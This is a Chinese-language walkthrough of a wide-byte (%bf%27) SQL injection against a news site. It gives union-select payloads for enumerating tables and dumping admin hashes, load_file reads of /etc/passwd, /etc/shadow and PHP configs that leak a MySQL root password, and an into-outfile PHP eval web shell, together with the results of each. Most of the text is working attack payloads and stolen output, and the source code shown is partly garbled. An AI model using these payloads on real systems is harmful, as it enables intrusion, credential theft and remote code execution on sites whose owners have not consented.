站点:http:// HdhCmsTest2cto测试数据 (代替目标站,非本站) 注入点:http://HdhCmsTest2cto测试数据 /news_view.php?id=94 提交%bf’ 出现错误,由此可见存在宽字节注入 接着%bf%27 and1=1 %23 正确返回 %bf%27 order by 10 %23 返回正确 判断当前页面字段数当前页面字段数为10 接着渗透 %bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23 返回正确 返回3 9 用database() 爆出 数据库 名字为international 直接爆表 先用dual表判断了一下information.schema.tables 是否可用 判断结果 成功返回3 9,这样判断information_schema.table 可用。 接着用table_name 替代3 同时在后边加上查询条件where TABLE_NAME= 0x696E7465726E6174696F6E616C international的十六进制 返回表名i_admin 初步判断为 管理员账号所在的表 通过limit 条件 接着爆表 i_admin i_application_configs i_application_information_step1 i_application_information_step2 i_application_information_step3 i_application_userbasic i_count i_department 。。。下面就不爆了 接着爆i_admin 的 字段 1,2,3,4,5,6,7,8,9,10 frominformation_schema.COLUMNS 正确返回数字 i_admin 十六进制0x695F61646D696E 加上where 条件 后 返回 字段uid 接着加limit条件 爆出所有的字段 uid m_id username password name state 至此i_admin 的字段名全部爆出。 接着爆username 和password 这两个 问题出现了 换成username 和password 返回错误??而uid和state没错误 Hex编码解决问题 Hex(username) 6A73 js Hex(password) 63316661363261616xxxxxxxxxxxx64323062383732666663366531303936 c1fa62aaeb049f62d20b872ffc6e1096 rxxxxxxx7 rxxxxxxx7 61646D696E admin 65313832613535xxxxxxxxxxxx36662626138316166636564343631 jxxxxxxxx2 7A687A 30343938303530xxxxxxxxxxxxxx466353730346337643336656438 jsxxxxxxxxxxx2 到此拿下后台密码 ————————————————- 换一种思路 因为 是root权限..到这了。。 load_file(0x2F6574632F706173737764) //读/etc/passwd文件 返回 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin a vahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HALdaemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin zf_job:x:501:501::/opt/www_application/job:/bin/bash angang523409:x:502:0::/home/angang523409:/bin/bash syyy:x:503:503::/opt/www_application/syyy:/bin/bash 网站所在目录 读:/opt/www_application/xxxxx/news_view.php 0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870 replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870),char(60),char(32)) ?php include_once(‘global.php’); if(isset($_GET[id])){$sql=]update i_newsbase set hits=hits+1 where id=].$_GET[id];mysql_query($sql); $query_view = mysql_query([SELECT * FROM `i_newsbase`WHERE `id`=’$_GET[id]‘;]); $row_view = mysql_fetch_array($query_view); }?> !DOCTYPE html PUBLIC ]-//W3C//DTD XHTML 1.0 Transitional//EN]"http://HdhCmsTestw3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd]> htmlxmlns=]http://HdhCmsTestw3.org/1999/xhtml]> head> metahttp-equiv=]Content-Type]content=]text/html; charset=GB2312″/> title> ?=$row_view[title]?> –?=$row_arr[websitename]?> /title> ?php include_once(‘header.php’);?> !–contene–> div id=]contene_]> divid=]box_l]> div id=]box_r]> divid=]l_box]> div class=]h_700″> div class=]blue]>h3>Focus News /h3> /div> ?php $query_news = mysql_query([SELECT *FROM `i_newsbase` order by `date_time` desc limit 12 ]); while($row_news =mysql_fetch_array($query_news)){ ?> p class=]p]> span> atitle=] ?=$row_news[title]?>] href=]news_view.php?id=?=$row_news[id]?>]> ?php if(strlen($row_news[title])>40) { echo$db->titlesubstr($row_news[title],0,40).]…] ;} else echo$row_news[title]; ?> /a> /span> /p> ?php } ?> /p> /div>/div> /div> /div> div id=]box_l_]> divid=]box_r_]> div id=]r_box]> div class=]blue]>h3> a href=]index.php]>Home /a> span>» /span> a href=]news_list.php]>News /a>/h3> /div> div class=]text]> div class=]title]>?php $query_all = mysql_query([SELECT * FROM `i_newsbase` as`a`,`i_newscontent` as `b` where `a`.`id`=`b`.`nid` and `a`.`id`=’$_GET[id]‘limit 1;]); $row_all = mysql_fetch_array($query_all); ?> divalign=]center]> ?=$row_all[title]?> /div> p> /p> pclass=]font]align=]center]>Date:?=date([Y-m-d],$row_all[date_time])?> /p> /div> ?=$row_all[content]?>/div> div class=]clear]> /div> /div> /div> /div>div class=]clear]> /div> div id=]ad]> /div>/div> ?php include_once(‘footer.php’); ?> 接着读取 Global.php /opt/www_application/xxxxx/global.php 0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870 replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870),char(60),char(32)) 返回 ?php include_once (‘./configs/config.php’);include_once (‘./common/mysql.class.php’); include_once(‘./common/action.class.php’); include_once (‘./common/page.class.php’); $db =new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);$query_config=$db->query([SELECT * FROM `i_config`]); while($row_config=$db->fetch_array($query_config)){$row_arr[$row_config[name]]=$row_config[values];$row_eng[$row_config[name]]=$row_config[xxxxx_values]; } ?> 读./configs/config.php /opt/www_application/xxxxx/configs/config.php /opt/www_application/configs/config.php 0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870 replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870),char(60),char(32)) 返回空。。。。。。。。无此文件 /opt/www_application/xxxxx/configs/config.php 0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870 replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870),char(60),char(32)) 返回: ?php include_once(‘db_config.php’);include_once(‘variable_config.php’);/****************************************************************************** 上传图片的参数说明:$max_file_size : 上传文件大小限制, 单位BYTE $destination_folder : 上传文件路径$watermark : 是否附加水印(1为加水印,其他为不加水印); 使用说明: 1. 将 PHP .INI文件里面的]extension=php_gd2.dll]一行前面的;号去掉,因为我们要用到GD库; 2. 将extension_dir =改为你的php_gd2.dll所在目录; ******************************************************************************/// 上传文件类型列表$uptypes=array( ’image/jpg’, ’image/jpeg’, ’image/png’, ’image/pjpeg’,'image/gif’, ’image/bmp’, ’image/x-png’); $max_file_size=2000000; //上传文件大小限制, 单位BYTE$destination_folder=]uploading/]; //上传文件路径$watermark=1; //是否附加水印(1为加水印,其他为不加水印); $watertype=1; //水印类型(1为文字,2为图片)$waterposition=1; //水印位置(1为左下角,2为右下角,3为左上角,4为右上角,5为居中); $waterstring=]TY];//水印字符串$waterimg=]xplore.gif]; //水印图片$imgpreview=1; //是否生成预览图(1为生成,其他为不生成); $imgpreviewsize=1/1; //缩略图比例?> /opt/www_application/xxxxx/configs/db_config.php 0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870 replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870),char(60),char(32)) 返回 x ?php // 该文件为存储用户数据库的变量的文件$mydbhost = ]localhost]; $mydbuser = ]root];$mydbpw = ]xyw1120″; $mydbname = ]international];$mydbcharset = ]GBK]; ?> 目的达到:mysql 账号root ,密码xyw1120 /opt/www_application/xxxxx/1.php select ]dddd] into outfile’/var/www/data/suddytest.php’ select ’<?php eval($_POST[cmd])?>’into outfile ’D:/PHPnow-1.5.4/htdocs/index2.php’ select ’<?php echo ]HelloWorld]; ?>’ into outfile ’/opt/www_application/xxxxx/index2.php’ 757365726E616D65 /etc/vpn/server.conf 0x2F6574632F76706E2F736572766572 E636F6E66 replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32)) replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32)) 扫一下端口 80 Open 111 Open 1723 Open 3306 Open 1723 vpn端口,从这个角度出发。。。。。接着 渗透 读/etc/shadow 0x2F6574632F736861646F77 replace(load_file(0x2F6574632F736861646F77),char(60),char(32)) 内容如下 HdhCmsTest2cto测试数据 root:$1$PqDYAJMy$nrwxVO7zGgQsd.cNfzOSp0:14731:0:99999:7:::bin:$1$v/3WmY2W$jUw9sPr2kDkW0BvNB63gO.:14847:0:99999:7:::daemon:*:14215:0:99999:7::: adm:*:14215:0:99999:7::: lp:*:14215:0:99999:7:::sync:*:14215:0:99999:7::: shutdown:*:14215:0:99999:7::: halt:*:14215:0:99999:7:::mail:*:14215:0:99999:7::: news:*:14215:0:99999:7::: uucp:*:14215:0:99999:7:::operator:*:14215:0:99999:7::: games:*:14215:0:99999:7:::gopher:*:14215:0:99999:7::: ftp:*:14215:0:99999:7:::nobody:*:14215:0:99999:7::: rpm:!!:14215:0:99999:7::: dbus:!!:14215:0:99999:7:::avahi:!!:14215:0:99999:7::: mailnull:!!:14215:0:99999:7:::smmsp:!!:14215:0:99999:7::: nscd:!!:14215:0:99999:7::: vc sa:!!:14215:0:99999:7::: rpc:!!:14215:0:99999:7:::rpcuser:!!:14215:0:99999:7::: nfsnobody:!!:14215:0:99999:7::: sshd:!!:14215:0:99999:7:::pcap:!!:14215:0:99999:7::: haldaemon:!!:14215:0:99999:7:::xfs:!!:14215:0:99999:7::: mysql :!!:14218:0:99999:7::: apache:!!:14221::::::ntp:!!:14545:::::: zf_job:$1$.EE7dw2F$/G1ObIx0vfXZsZ/DBid/z0:14728:0:99999:7:::angang523409:$1$vA29oCDp$FJo378ewOAgvfu0c7tjwD0:14747:0:99999:7:::syyy:$1$38W/v5/Z$L5K9oIAdaFHH8js6fODFL/:15265:0:99999:7::: 作者:137747998@qq测试数据
查看更多关于一次宽字符注入渗透过程 - 网站安全 - 自学php的详细内容...